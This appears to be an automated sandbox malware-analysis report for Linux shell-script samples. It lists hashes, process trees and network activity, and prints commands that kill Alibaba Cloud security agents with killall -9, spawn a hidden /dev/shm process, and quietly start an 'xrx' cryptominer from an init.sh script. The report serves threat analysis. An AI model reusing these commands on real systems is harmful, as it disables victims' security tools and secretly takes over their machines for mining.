SHA256 bbe8f1dd9974aba408b38e18b0628341bbec08f2493973ff9b6446fa03701823
SHA512 5d8f456ad7bd9a9e4bbf677b03665ee22f1ed9479ea1fbceb004e97dbcdd9a84248c32e017b786fede7baf037c2249078e2e24bc38215d8d4f099f773494fa80

/etc/shadow+

MD5 522d75bc5cce1b1e78f4712ee2103c83
SHA1 d8e739ee8738ca5ed67c6c7ebd8dd6bf754a1f3a
SHA256 0c10eb84053e72f8544c248c5b5e3108c165b01f2d51bc709cda3d7690984c25
SHA512 a55c55230897ab9690e282ec218b6cf6f87fdfbbdce8e54747bb4c4db455cf71d31a0d590e0bee4ff6277dc88e97c92b3b508ec4e710fc35df89075b4870ed26

/etc/group+

MD5 b43bcab2b519b1f1d699ab5c9dc418eb
SHA1 e983ed6f5c31b3706b9d3eaf5efdcfe932d653bc
SHA256 4f94732b04d039e70819b986801ab8bb50cc056284e4b4536d46beca0f546f43
SHA512 87999a80f6d7eee4761fd0bb4948235a3133354916ee9ccb8c30eef97a895245959c3bbc7574afbea2f5071194743c15526a7d627d6e2e3edd6ff31a3bf059e9

/etc/gshadow+

MD5 9452ee212552c9f49ebca01b6291a740
SHA1 85e33b01e1d041ad6809067ed50b1770c9be478f
SHA256 363cd5c14472d9750701c768b7657d191e8e76b899b83aca2366ec6c82481669
SHA512 0427539b0dc8fd4c62a0389062a9868615f8cdd21ef4f248dc84ce999f647936b95492377e8655ad903addda37f4c8edea09a1ffdd2e7c014825e62fbfd68f7a

/etc/subuid+

MD5 4641942396624780f617210b1c564db9
SHA1 5f87f6066aed9fdc0cc1a907a397ba383731ac57
SHA256 6ed2c35ec029779fb7f08108345965c99c171908cd125934943dfc6c9a17d32e
SHA512 dccd0d158d875f145746c5efa7b1e87f458d4f1d1b91391958cb6e669ad2f8060c49bef46d79af62b521b02c4d10e8e4e50b4245bed539284eed580b3e3d23ca

/etc/group+

MD5 84eb5d846ee7bfef527db974a5feb1b2
SHA1 e811387fb348ab546f82d60d66a0c9a9c9735d36
SHA256 c11f30bbdc83688d1329289c0f5324e9aa0b0b81365eb6375b953103a2c43456
SHA512 f1fbc838ce695cb448038b8732fb054fd6f5502b6203377eb339e5bcbb8eb877c4f8c10ba5c30591eab82de3603c0a228243dfda7611eff3ae14d9813d69a25b

/etc/gshadow+

MD5 5c0e7d545ff1cfa0ba68f27349507a87
SHA1 0aa5fc2c5a8e1be03ce1bf2b4e68b82de1eb8d47
SHA256 0e4b06466a4c58fbf83afd9939466b7c2a461c27ee876cbec97afae04e53e44b
SHA512 2913398db0dcd7d719c1b455d6d62797f042f99fe8653b97bd36d3354d659d05e400b8d3729254ec793ed37876d0045628f9bd26ba566e1a4bb86c3df39b1954

/etc/shadow+

MD5 42618d971aee1714cb3609180e4aeb22
SHA1 b9917df156232b25c5c0517a9495b28e1cc05181
SHA256 da8d47a70cba6c7d9e2d8892feff90a651293fd622f3d485e44f7f0a0006d33d
SHA512 d02cb266b0d61c96021edca59609fae505f2816fa8c36e6b8cd9f929ea9a80045a3293ac5b571ca0a362b2c860e4404587629f40c5184aa1dc0608a05a73f4f3

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsbe-20240418-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240611-en

Max time kernel

3s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/111/cmdline /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/456/stat /usr/bin/killall N/A
File opened for reading /proc/135/stat /usr/bin/killall N/A
File opened for reading /proc/155/stat /usr/bin/killall N/A
File opened for reading /proc/649/stat /usr/bin/killall N/A
File opened for reading /proc/411/stat /usr/bin/killall N/A
File opened for reading /proc/656/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/263/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/656/cmdline /usr/bin/killall N/A
File opened for reading /proc/649/cmdline /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/656/stat /usr/bin/killall N/A
File opened for reading /proc/212/stat /usr/bin/killall N/A
File opened for reading /proc/680/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/111/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/406/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/110/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/265/stat /usr/bin/killall N/A
File opened for reading /proc/679/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/680/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/280/stat /usr/bin/killall N/A
File opened for reading /proc/307/stat /usr/bin/killall N/A
File opened for reading /proc/296/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/451/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/676/stat /usr/bin/killall N/A
File opened for reading /proc/264/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/681/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/135/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:54

Platform

ubuntu2004-amd64-20240729-en

Max time kernel

0s

Max time network

180s

Command Line

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/13/stat /usr/bin/pidof N/A
File opened for reading /proc/105/cmdline /usr/bin/pidof N/A
File opened for reading /proc/617/cmdline /usr/bin/pidof N/A
File opened for reading /proc/633/stat /usr/bin/pidof N/A
File opened for reading /proc/922/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1088/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1110/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1145/stat /usr/bin/pidof N/A
File opened for reading /proc/1338/cmdline /usr/bin/pidof N/A
File opened for reading /proc/6/cmdline /usr/bin/pidof N/A
File opened for reading /proc/167/cmdline /usr/bin/pidof N/A
File opened for reading /proc/452/cmdline /usr/bin/pidof N/A
File opened for reading /proc/453/cmdline /usr/bin/pidof N/A
File opened for reading /proc/519/stat /usr/bin/pidof N/A
File opened for reading /proc/537/cmdline /usr/bin/pidof N/A
File opened for reading /proc/579/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1001/stat /usr/bin/pidof N/A
File opened for reading /proc/1094/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1206/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1361/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1397/stat /usr/bin/pidof N/A
File opened for reading /proc/85/stat /usr/bin/pidof N/A
File opened for reading /proc/140/cmdline /usr/bin/pidof N/A
File opened for reading /proc/990/stat /usr/bin/pidof N/A
File opened for reading /proc/1103/cmdline /usr/bin/pidof N/A
File opened for reading /proc/75/cmdline /usr/bin/pidof N/A
File opened for reading /proc/454/cmdline /usr/bin/pidof N/A
File opened for reading /proc/498/cmdline /usr/bin/pidof N/A
File opened for reading /proc/575/cmdline /usr/bin/pidof N/A
File opened for reading /proc/668/stat /usr/bin/pidof N/A
File opened for reading /proc/1001/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1079/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1312/stat /usr/bin/pidof N/A
File opened for reading /proc/1347/cmdline /usr/bin/pidof N/A
File opened for reading /proc/162/stat /usr/bin/pidof N/A
File opened for reading /proc/673/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1347/stat /usr/bin/pidof N/A
File opened for reading /proc/23/stat /usr/bin/pidof N/A
File opened for reading /proc/200/stat /usr/bin/pidof N/A
File opened for reading /proc/454/stat /usr/bin/pidof N/A
File opened for reading /proc/1340/stat /usr/bin/pidof N/A
File opened for reading /proc/1346/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1361/stat /usr/bin/pidof N/A
File opened for reading /proc/1065/cmdline /usr/bin/pidof N/A
File opened for reading /proc/1404/stat /usr/bin/pidof N/A
File opened for reading /proc/3/cmdline /usr/bin/pidof N/A
File opened for reading /proc/13/cmdline /usr/bin/pidof N/A
File opened for reading /proc/79/cmdline /usr/bin/pidof N/A
File opened for reading /proc/270/stat /usr/bin/pidof N/A
File opened for reading /proc/694/stat /usr/bin/pidof N/A
File opened for reading /proc/803/cmdline /usr/bin/pidof N/A
File opened for reading /proc/858/cmdline /usr/bin/pidof N/A
File opened for reading /proc/71/cmdline /usr/bin/pidof N/A
File opened for reading /proc/441/cmdline /usr/bin/pidof N/A
File opened for reading /proc/632/stat /usr/bin/pidof N/A
File opened for reading /proc/668/cmdline /usr/bin/pidof N/A
File opened for reading /proc/779/stat /usr/bin/pidof N/A
File opened for reading /proc/5/stat /usr/bin/pidof N/A
File opened for reading /proc/11/stat /usr/bin/pidof N/A
File opened for reading /proc/242/cmdline /usr/bin/pidof N/A
File opened for reading /proc/615/cmdline /usr/bin/pidof N/A
File opened for reading /proc/22/stat /usr/bin/pidof N/A
File opened for reading /proc/168/cmdline /usr/bin/pidof N/A
File opened for reading /proc/171/cmdline /usr/bin/pidof N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/xrx/init.sh N/A
N/A N/A /bin/bash N/A
N/A N/A /tmp/xrx/init.sh N/A
N/A N/A /bin/bash N/A

Processes

/tmp/xrx/init.sh

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/bin/bash

[/tmp/xrx/init.sh -c exec '/tmp/xrx/init.sh' "$@" /tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/tmp/xrx/init.sh

[/tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/bin/bash

[/tmp/xrx/init.sh -c #!/bin/bash if [[ $(cat config.json | grep xxcountxx) ]]; then echo "configuring miner" sed -i "s/xxcountxx/$(nproc)/g" config.json else echo "using preconfigured miner" fi PID=$(pidof xrx) if [ $# -eq 0 ]; then ##if no arguments if [ -z "${PID}" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo "miner online" else echo "miner already online" fi fi /tmp/xrx/init.sh strace -f -e trace=execve -o trace_output.txt bash script.sh]

/usr/bin/grep

[grep xxcountxx]

/usr/bin/cat

[cat config.json]

/usr/bin/pidof

[pidof xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.96:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-armhf-20240418-en

Max time kernel

140s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240226-en

Max time kernel

22s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/683/stat /usr/bin/killall N/A
File opened for reading /proc/644/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/144/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/363/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/653/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/74/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/392/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/648/stat /usr/bin/killall N/A
File opened for reading /proc/644/stat /usr/bin/killall N/A
File opened for reading /proc/36/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/669/stat /usr/bin/killall N/A
File opened for reading /proc/390/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/366/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A
File opened for reading /proc/711/stat /usr/bin/killall N/A
File opened for reading /proc/234/stat /usr/bin/killall N/A
File opened for reading /proc/144/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/730/stat /usr/bin/killall N/A
File opened for reading /proc/361/stat /usr/bin/killall N/A
File opened for reading /proc/688/cmdline /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/19/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/114/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/234/stat /usr/bin/killall N/A
File opened for reading /proc/323/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/392/stat /usr/bin/killall N/A
File opened for reading /proc/82/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

140s

Max time network

131s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.39:443 tcp
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240611-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1193/stat /usr/bin/killall N/A
File opened for reading /proc/1066/stat /usr/bin/killall N/A
File opened for reading /proc/460/stat /usr/bin/killall N/A
File opened for reading /proc/1122/cmdline /usr/bin/killall N/A
File opened for reading /proc/1148/stat /usr/bin/killall N/A
File opened for reading /proc/674/cmdline /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/965/stat /usr/bin/killall N/A
File opened for reading /proc/1130/stat /usr/bin/killall N/A
File opened for reading /proc/1171/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/552/stat /usr/bin/killall N/A
File opened for reading /proc/173/stat /usr/bin/killall N/A
File opened for reading /proc/962/stat /usr/bin/killall N/A
File opened for reading /proc/1197/stat /usr/bin/killall N/A
File opened for reading /proc/650/stat /usr/bin/killall N/A
File opened for reading /proc/1331/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/1/stat /usr/bin/killall N/A
File opened for reading /proc/1130/cmdline /usr/bin/killall N/A
File opened for reading /proc/1189/cmdline /usr/bin/killall N/A
File opened for reading /proc/165/stat /usr/bin/killall N/A
File opened for reading /proc/169/stat /usr/bin/killall N/A
File opened for reading /proc/1114/cmdline /usr/bin/killall N/A
File opened for reading /proc/1062/stat /usr/bin/killall N/A
File opened for reading /proc/1014/stat /usr/bin/killall N/A
File opened for reading /proc/1193/stat /usr/bin/killall N/A
File opened for reading /proc/1014/stat /usr/bin/killall N/A
File opened for reading /proc/647/stat /usr/bin/killall N/A
File opened for reading /proc/1548/stat /usr/bin/killall N/A
File opened for reading /proc/1134/stat /usr/bin/killall N/A
File opened for reading /proc/78/stat /usr/bin/killall N/A
File opened for reading /proc/159/stat /usr/bin/killall N/A
File opened for reading /proc/1072/stat /usr/bin/killall N/A
File opened for reading /proc/1189/stat /usr/bin/killall N/A
File opened for reading /proc/168/stat /usr/bin/killall N/A
File opened for reading /proc/955/stat /usr/bin/killall N/A
File opened for reading /proc/1331/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/552/stat /usr/bin/killall N/A
File opened for reading /proc/84/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/1043/stat /usr/bin/killall N/A
File opened for reading /proc/560/stat /usr/bin/killall N/A
File opened for reading /proc/496/stat /usr/bin/killall N/A
File opened for reading /proc/269/stat /usr/bin/killall N/A
File opened for reading /proc/248/stat /usr/bin/killall N/A
File opened for reading /proc/1076/cmdline /usr/bin/killall N/A
File opened for reading /proc/1154/stat /usr/bin/killall N/A
File opened for reading /proc/462/stat /usr/bin/killall N/A
File opened for reading /proc/1076/cmdline /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/1134/cmdline /usr/bin/killall N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/1043/stat /usr/bin/killall N/A
File opened for reading /proc/674/cmdline /usr/bin/killall N/A
File opened for reading /proc/167/stat /usr/bin/killall N/A
File opened for reading /proc/732/stat /usr/bin/killall N/A
File opened for reading /proc/1090/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/83/stat /usr/bin/killall N/A
File opened for reading /proc/1262/stat /usr/bin/killall N/A
File opened for reading /proc/85/stat /usr/bin/killall N/A
File opened for reading /proc/1275/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/usr/bin/lsb_release

[lsb_release -a]

/usr/local/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/local/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/sbin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/usr/bin/dpkg-query

[dpkg-query -f ${Version} ${Provides} -W lsb-core lsb-cxx lsb-graphics lsb-desktop lsb-languages lsb-multimedia lsb-printing lsb-security]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 151.101.193.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
GB 84.17.50.8:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.39:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

130s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/81/stat /usr/bin/killall N/A
File opened for reading /proc/552/cmdline /usr/bin/killall N/A
